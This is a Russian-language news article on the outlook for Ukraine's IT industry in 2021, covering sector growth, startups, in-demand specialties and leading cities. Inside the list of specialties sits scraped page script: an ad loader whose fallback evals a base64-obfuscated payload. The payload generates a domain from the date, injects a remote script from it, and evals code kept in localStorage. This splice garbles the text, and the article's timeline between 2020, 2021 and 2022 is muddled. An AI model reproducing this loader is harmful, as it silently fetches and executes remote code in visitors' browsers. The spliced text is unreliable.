Обзор перспектив сферы информационных технологий в Украине в 2021 году

Что ждет украинский рынок IT в 2021 году: прогнозы специалистов

Мировая экономика в 2020 году пострадала от кризиса, вызванного пандемией. Карантинные ограничения ударили и по украинскому бизнесу, но сфера IT оказалась в числе наименее пострадавших. Объем вакансий в области информационных технологий восстановился практически сразу после снятия жестких ограничений. По итогам года этот сектор экономики смог удержать показатели на уровне предшествующего периода и даже показал небольшой рост.

Сфера IT показывает положительную динамику

В предшествующие годы украинская отрасль информационных технологий регулярно демонстрировала рост на уровне не менее 20%. В начале 2021-го эксперты предсказывали очередные +30% по итогам года, но пандемия внесла коррективы в ожидания.

Экономический кризис вызвал снижение темпов развития, но не смог спровоцировать спад, поэтому сектор IT завершил год в небольшом плюсе. При условии отсутствия новых потрясений есть все основания полагать, что рост продолжится и в 2022-м.

Новые проекты выходят на рынок

Украинские IT-специалисты ежегодно создают сотни новых продуктов, и многие из них находят мировое признание. Ярким примером подобного стартапа стал сервис Grammarly. Он вдохновляет новых разработчиков, на собственном примере демонстрируя, что у создателей полезных и перспективных продуктов есть все шансы добиться успеха.

На выставке CES в 2020 году был представлен ряд интересных разработок украинских специалистов:

биоразлагаемые зубные щетки Effa, уменьшающие объем загрязнений окружающей среды;

система UATAG, призванная защитить рынок от контрафактных и поддельных товаров;

ловушка для насекомых Mosquito Control, не содержащая ядохимикатов;

система CamTouch, позволяющая превратить любую поверхность в сенсорную панель.

Не все украинские стартапы в конечном итоге достигают успеха. Специалисты отмечают проблемы молодых компаний, возникающие при поиске источников финансирования. Именно дефицит инвестиций является главной причиной закрытия стартапов. Однако все больше украинских компаний в итоге достигает успеха.

Популярные специальности в сфере IT

Специалисты IT рекрутингового агентства The Gravity Agency отмечают повышение спроса на представителей IT-профессий даже в условиях кризиса. По данным компании, бизнес больше всего заинтересован в опытных разработчиках уровня Senior, но и для новичков открывается много вакансий. В 2021 году самыми популярными оказались направления:

техническая поддержка пользователей; var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

аналитика и обработка данных;

разработка систем искусственного интеллекта;

специалисты по веб-дизайну и seo специалист;

развертывание и поддержка коммуникаций.

Специалисты, владеющие профессиями из этих областей, высоко ценятся компаниями и могут претендовать на высокооплачиваемые вакансии. В их услугах заинтересован как отечественный бизнес, так и зарубежные корпорации. Растет и присутствие в Украине международных крупных фирм уровня Huawei или Microsoft. Они активно открывают свои подразделения, создавая новые рабочие места для украинских специалистов и открывая им путь к карьерному росту. Конкуренция со стороны международного бизнеса побуждает и украинские IT-компании улучшать условия для специалистов.

Лучшая динамика развития сферы IT наблюдается в больших городах

Специалисты рекрутингового агентства The Gravity Agency отмечают наибольшую активность IT-компаний в Киеве. Именно в столице базируется наибольшее количество таких фирм, которые готовы предложить хорошие условия и тем самым привлекают специалистов со всей страны. За Киевом следуют другие мегаполисы:

Одесса;

Харьков;

Днепр;

Львов.

Наряду с офисной работой многие компании готовы предложить удаленную. Существенно выросло число таких вакансий после начала пандемии и введения карантина. Поэтому, несмотря на сложную экономическую ситуацию, эксперты не видят предпосылок для спада в украинской отрасли IT. По состоянию на начало 2021-го есть все основания предполагать, что по итогам года этот сектор экономики продемонстрирует очередные цифры прироста. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/obzor-perspektiv-sfery-informatsionnyh-tehnologij-v-ukraine-v-2021-godu/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top